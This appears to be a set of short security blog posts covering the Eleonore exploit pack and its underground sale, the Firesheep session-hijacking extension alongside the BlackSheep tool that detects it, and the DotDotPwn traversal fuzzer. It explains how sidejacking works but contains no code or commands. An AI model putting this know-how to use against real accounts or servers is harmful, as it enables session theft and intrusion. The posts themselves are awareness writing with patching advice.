Eleonore exploit pack

Exploit packs have been selling in the underground for hundreds of dollars in recent years. These pre-packaged kits are designed to probe the visitor’s browser for known security vulnerabilities, and then use the first one found as a vehicle to quietly install malicious software. They normally comes with a Web administration page, which gives the attacker real-time statistics about victims, such as which browser exploits are working best, and which browsers and browser versions are most successfully attacked. Those commonly found in the market were iPack, Crimepack and Eleonore.

The latter, Eleonore, is the most popular kit and have been making the headlines recently. It is claim to cost between USD$500 - USD$1000 (based on the version). The package was updated approximately every month with the latest browser, PDF and Java vulnerabilities. These kit providers provide "secured" support, updates and even cleanup of the package service if necessary.


Eleonore Web administration page


Crimepack Web administration page

w01f advise: Always patch up your system, especially Internet browser, Java, Flash and PDF applications.

FireSheep Vs BlackSheep

Firesheep
It is a Firefox extension that demonstrates HTTP session hijacking attacks. HTTP session hijecking (commonly known as Sidejacking) is a common vulnerability, which sniff the network traffic and extract victim's session information or cookie. With the session information, it can gain access to the victim's account without the need of username and password.

I have previously blog on sidejacking with Ferret and Hamster.

Firesheep is free, open source, and is available now for Mac OS X and Windows.



BlackSheep
BlackSheep, also a Firefox plugin is designed to combat Firesheep. BlackSheep does this by dropping ‘fake’ session ID information on the wire and then monitors traffic to see if it has been hijacked. While Firesheep is largely passive, once it identifies session information for a targeted domain, it then makes a subsequent request to that same domain, using the hijacked session information in order to obtain the name of the hijacked user along with an image of the person, if available. It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When identified, the user will be receive the following warning message:



Please note that Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.

DotDotPwn 2.1

DotDotPwn is a Directory Traversal Fuzzer. It works on HTTP, FTP and TFTP servers directory traversal vulnerability. It's written in perl language and can be run either under *NIX or Windows platform.

It is written by chr1x (member of our sectester group) and nitr0us. It had just released v2.1, which is more flexible intelligent. So far, 8 security vulnerabilities were discovered by this tools. It was also voted to be included in the next release of the Backtrack Distro.

Well Done chr1x!!